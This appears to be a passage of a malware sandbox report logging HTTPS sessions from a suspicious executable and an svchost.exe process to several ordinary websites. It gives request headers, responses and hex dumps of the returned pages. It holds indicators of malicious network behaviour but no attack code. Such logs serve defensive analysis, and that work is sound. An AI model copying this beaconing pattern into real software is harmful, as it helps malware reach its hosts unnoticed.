                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC495INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC530INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC546INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC562INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      3192.168.2.550205188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC52OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC52INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:27 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wLueudhuaEpl%2B1qRk7O11Mpv%2BRakvM%2B4TOl3LhEHzjrAN%2BIux1LFRle4xMagFQArK8pZounJy9j11f2N0x22phDEW7b%2FL97UGkKfIgGl0H%2BmMb0GAcWJOmdQzyOS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc7914803360c-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC53INData Raw: 31 65 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e7d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC54INData Raw: 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: Compatible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC55INData Raw: 20 20 73 69 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 48 4d 49 48 33 32 5f 59 4b 5a 33 32 50 5f 67 47 53 70 49 4f 75 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69
                                                                                                                                                                                                                                                                                                      Data Ascii: sigtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=HMIH32_YKZ32P_gGSpIOux.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycGzNCOU" method="POST" enctype="applicati
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC56INData Raw: 36 76 72 50 48 61 69 51 77 63 6e 79 6c 44 37 59 31 62 76 6d 50 6a 71 52 6f 5f 6d 70 2d 35 6b 4b 59 38 30 57 61 35 72 66 6e 38 5a 58 79 55 79 66 54 70 2d 6e 7a 76 74 4d 74 75 4b 38 6d 42 42 6d 33 47 56 5f 4d 78 48 76 51 56 35 59 76 38 48 79 4a 2d 62 31 4a 75 42 72 4e 4f 47 6e 41 67 73 59 6f 79 34 4a 64 63 58 4a 54 59 75 79 56 56 55 63 57 54 73 74 73 31 57 54 7a 4f 64 71 38 5a 5a 48 68 38 6c 77 66 4e 65 68 2d 79 59 70 55 79 39 71 54 61 49 57 59 73 5f 4c 30 4b 33 47 4e 70 4c 6f 50 58 74 7a 62 72 42 6d 6f 59 59 78 37 38 5f 30 61 65 69 53 4a 74 57 74 33 71 48 30 62 6c 37 65 79 34 4f 4a 45 4c 76 74 6a 49 6a 41 58 2d 4c 4c 38 48 6e 79 39 55 4e 79 6b 6e 6f 68 57 64 38 57 78 64 30 61 4d 74 42 33 66 4f 6e 59 59 6a 50 35 31 2d 58 44 55 33 4f 6d 33 45 72 50 34 74 76
                                                                                                                                                                                                                                                                                                      Data Ascii: 6vrPHaiQwcnylD7Y1bvmPjqRo_mp-5kKY80Wa5rfn8ZXyUyfTp-nzvtMtuK8mBBm3GV_MxHvQV5Yv8HyJ-b1JuBrNOGnAgsYoy4JdcXJTYuyVVUcWTsts1WTzOdq8ZZHh8lwfNeh-yYpUy9qTaIWYs_L0K3GNpLoPXtzbrBmoYYx78_0aeiSJtWt3qH0bl7ey4OJELvtjIjAX-LL8Hny9UNyknohWd8Wxd0aMtB3fOnYYjP51-XDU3Om3ErP4tv
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC58INData Raw: 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 34 38 34 30 39 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 37 39 31 34 38 30 33 33 36 30 63 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 62 30 31 33 63 63 31 62 61 36 34 66 61 35 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 48 4d 49 48 33 32 5f 59 4b 5a 33 32 50 5f 67 47 53 70 49 4f 75 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47
                                                                                                                                                                                                                                                                                                      Data Ascii: one: 'sigtoa.com', cType: 'managed', cNounce: '48409', cRay: '7abbc7914803360c', cHash: 'b013cc1ba64fa5d', cUPMDTk: "\/?__cf_chl_tk=HMIH32_YKZ32P_gGSpIOux.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycG
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC59INData Raw: 4e 4a 78 36 4d 49 31 54 46 62 6b 30 56 6b 71 61 6a 4f 6c 6a 65 58 55 32 70 64 35 52 72 64 67 35 63 71 74 48 63 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 58 35 39 66 61 56 57 68 5a 42 61 77 35 71 43 41 79 59 71 5a 4f 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 69 56 6a 38 49 4c 30 48 6f 45 51 49 78 51 36 52 36 52 79 4f 6c 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33
                                                                                                                                                                                                                                                                                                      Data Ascii: NJx6MI1TFbk0VkqajOljeXU2pd5Rrdg5cqtHcU=', i1: 'X59faVWhZBaw5qCAyYqZOQ==', i2: 'iVj8IL0HoEQIxQ6R6RyOlQ==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC60INData Raw: 78 2e 42 4c 55 4a 32 6d 56 50 66 42 39 4a 68 79 66 69 5f 70 79 51 2d 31 36 37 39 34 36 30 32 36 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43
                                                                                                                                                                                                                                                                                                      Data Ascii: x.BLUJ2mVPfB9Jhyfi_pyQ-1679460267-0-gaNycGzNCOU" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendC
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:27 UTC61INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      30192.168.2.562419185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC349INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      31192.168.2.562424172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Set-Cookie: d55e479f054c94814cbc10d217aaa990=1d3ede42cc885cee40835e91a67860f7; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:45:07 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RB8mUypZQERhPP5XRQggwhNnUpRAgNpc8JEomI3Qagg4HfVUDhsXUzxKb4LP7nnuDGmrLWuGc7LapLorTkvfpyhjfBOne2nUmo9mniygxQbh0vMnJ%2BQKaLjyMksKko0O4nTC8yJJ6t8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc885bcad90fa-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC633INData Raw: 37 63 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 7c54<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC633INData Raw: 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69
                                                                                                                                                                                                                                                                                                      Data Ascii: "/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/medi
